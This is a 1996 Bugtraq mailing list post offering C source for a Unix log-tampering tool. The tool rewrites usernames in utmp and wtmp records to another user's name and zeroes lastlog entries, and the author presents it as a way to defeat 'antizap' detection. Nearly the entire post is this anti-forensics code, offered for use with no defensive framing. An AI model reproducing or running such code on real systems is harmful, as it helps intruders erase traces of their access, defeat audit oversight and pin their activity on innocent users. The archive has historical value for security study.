Bugtraq mailing list archives
no subject (file transmission)
From: danny () protocol ece iisc ernet in (Lone Wolf)
Date: Wed, 9 Oct 1996 23:26:26 +0500
hi here is a cure to antizap instead of chucking in null bytes in w/utmp replace it with the name of some other user i think this should do to fool the antizap programme danny #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <utmp.h> #include <lastlog.h> #include <pwd.h> #define bzero(x, y) memset(x, 0, y) int f; kill_tmp(name,who,whom) char *name, *who, *whom; { struct utmp utmp_ent,utmp_new; if ((f=open(name,O_RDWR))>=0) { while(read (f, &utmp_new, sizeof (utmp_new))> 0 ) if (!strncmp(utmp_new.ut_name,whom,strlen(whom))) { printf("ut_line :%s\n",utmp_new.ut_line); close(f); } } if ((f=open(name,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { strncpy(utmp_ent.ut_user,whom,8); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==3) { kill_tmp("/etc/utmp",argv[1],argv[2]); kill_tmp("/usr/adm/wtmp",argv[1],argv[2]); kill_lastlog(argv[1]); printf("The Lone Wolf Strikes ......!\n"); printf("%s changed to %s ......!\n",argv[1],argv[2]); } else { printf("Usage: filename uid_to_be_replaced required_uid.\n"); exit(1); } }
Current thread:
- no subject (file transmission) Lone Wolf (Oct 09)